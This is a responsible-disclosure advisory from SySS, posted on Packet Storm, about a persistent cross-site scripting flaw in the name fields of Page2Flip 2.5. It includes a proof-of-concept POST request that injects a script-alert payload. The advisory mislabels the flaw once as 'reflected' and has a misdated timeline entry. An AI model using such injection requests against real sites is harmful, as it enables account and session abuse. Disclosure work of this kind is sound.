what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Page2Flip 2.5 Cross Site Scripting

Page2Flip 2.5 Cross Site Scripting
Posted Aug 25, 2015
Authored by Dr. Erlijn van Genuchten | Site syss.de

Page2Flip version 2.5 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | a80dbfc906c92033fe34653626d3672fe4672f10582601c6398132ae3406a17b

Page2Flip 2.5 Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-028
Product: Page2Flip
Vendor: w!ssenswerft GmbH
Affected Version(s): Premium App 2.5, probably also in Business App
and Basic App, and in lower versions
Tested Version(s): Premium App 2.5
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
Solution Status: Open
Vendor Notification: 2015-06-29
Solution Date:
Public Disclosure:
CVE Reference: Not yet assigned
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

With the Page2Flip Web application, it is possible to create e-papers in
PDF format that can be flicked through digitally. Such e-papers can be
used for magazines, catalogues, flyers, etc. (see [1]).

The Page2Flip application is vulnerable to Persistent Cross-Site
Scripting so that administrative users can attack other administrative
users or users with fewer privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH identified a persistent cross-site scripting vulnerability
in the Page2Flip Premium App.

At least the parameters "first name" and "last name" are not sanitized
sufficiently resulting in a persistent cross-site scripting
vulnerability.

This reflected cross-site scripting vulnerability can be exploited in
the context of an authenticated user by storing script code in one of
these fields.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTTP POST request using the JavaScript code
"<script>alert(1)</script>" as the value for the parameter "nachname"
demonstrates the persistent cross-site scripting vulnerability by
showing a JavaScript alert box as soon as this user has logged on:

POST /settings/users HTTP/1.1
Host: <host>
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 1239
Cookie: <cookies>

accountEditForm=accountEditForm&javax.faces.ViewState=437392726575022409%3A-3508488346630943554&ice.window=9aib95sifa&ice.view=vvgml70d9&accountEditForm%3Aanrede=xxx&accountEditForm%3Avorname=xxx&accountEditForm%3Anachname=xxx%3Cscript%3Ealert(1)%3C%2Fscript%3E&accountEditForm%3Aemail=xxx&accountEditForm%3Apassword=xxx&accountEditForm%3Arights=ROLE_ADMINISTRATE_USER&accountEditForm%3Arights=ROLE_PUBLISH_DOCUMENTS&accountEditForm%3Arights=ROLE_CHANGE_SETTINGS&accountEditForm%3Arights=ROLE_CREATE_CUSTOMER&icefacesCssUpdates=&javax.faces.source=accountEditForm%3AsubmitBtn%3AsubmitBtn&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aib95sifa&ice.view=vvgml70d9&ice.focus=accountEditForm%3AsubmitBtn%3AsubmitBtn&accountEditForm%3AsubmitBtn%3AsubmitBtn=Save&ice.event.target=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.captured=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.type=onclick&ice.event.alt=false&ice.ev
ent.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=1281&ice.event.y=752&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.submit.serialization=form&javax.faces.partial.ajax=true


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-06-23: Vulnerability discovered
2013-06-29: Vulnerability reported to vendor
2015-07-07: Reported vulnerabilities again as the vendor did not respond
to the first e-mail
2015-07-14: Reminder sent concerning reported vulnerabilities
2015-08-24: Public release of security advisory according to the SySS
Responsible Disclosure Policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Page2Flip homepage
http://page2flip.de/
[2] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Erlijn van Genuchten of the
SySS GmbH.

E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJV2x3sAAoJEAylhje9lv8qTP8QAK2z/18lni4UnWo3RElmM+/c
CiaqysnydDIvREm2Px36HQjeUDrYA35pZZhxi742E/flMhGw2/aH1gdVtmB6K7ai
qnIvStXOIMVul7IGhuHsOn+W7k7IfRx4726VGVoWNyUFoLmn5azU6/OqY+2ql6fH
rh/RfdKt8Lp2Q0KSdZy7Le3Il7hJX7YRoD8O/uECI7U2MtVwWJQg/zfK1y9+zFpP
Z7v55GMWRDZ4UWin6Fgps3ayVqdnmwUOo0R8xIkn9HU5j7S89QT+nRBE46FLO4ED
ZidsWxTeoUS75COcWsuCWVJXsse4KpdDSBVfIPoRG9OUU5s081OuDXHApZGYVlZb
lHlmVwjtyIGXUe5vecdCzjY4rk+C3nWwnr9Tew4QNtzg3NdPfugrpNeyBGFeVcu6
749ojAkzcGbFToEvbYBehBsbnNFq1DbUuLTkib+TCmM36/UZiZRZ9rnVS1T4e7Z3
r6fSlYVmFT19j4KfyucDvLv1XVsj4AJ77YI51xlRvnDEJkmQd3pvGfixZJ3n0Gse
eY9l7398jSzMMv+ePZ2eDWFomt23+tNODROy/ST9n15avYi2WlNb3aai86CdGnqZ
bstvEc7NTVyMotWmfYmbWidqMiCI4toB9ZAUMVlEUKTKMLQp6vUZe8lUiOpjNczE
0vOmqRgHRAff0wPtjo1I
=rzEs
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close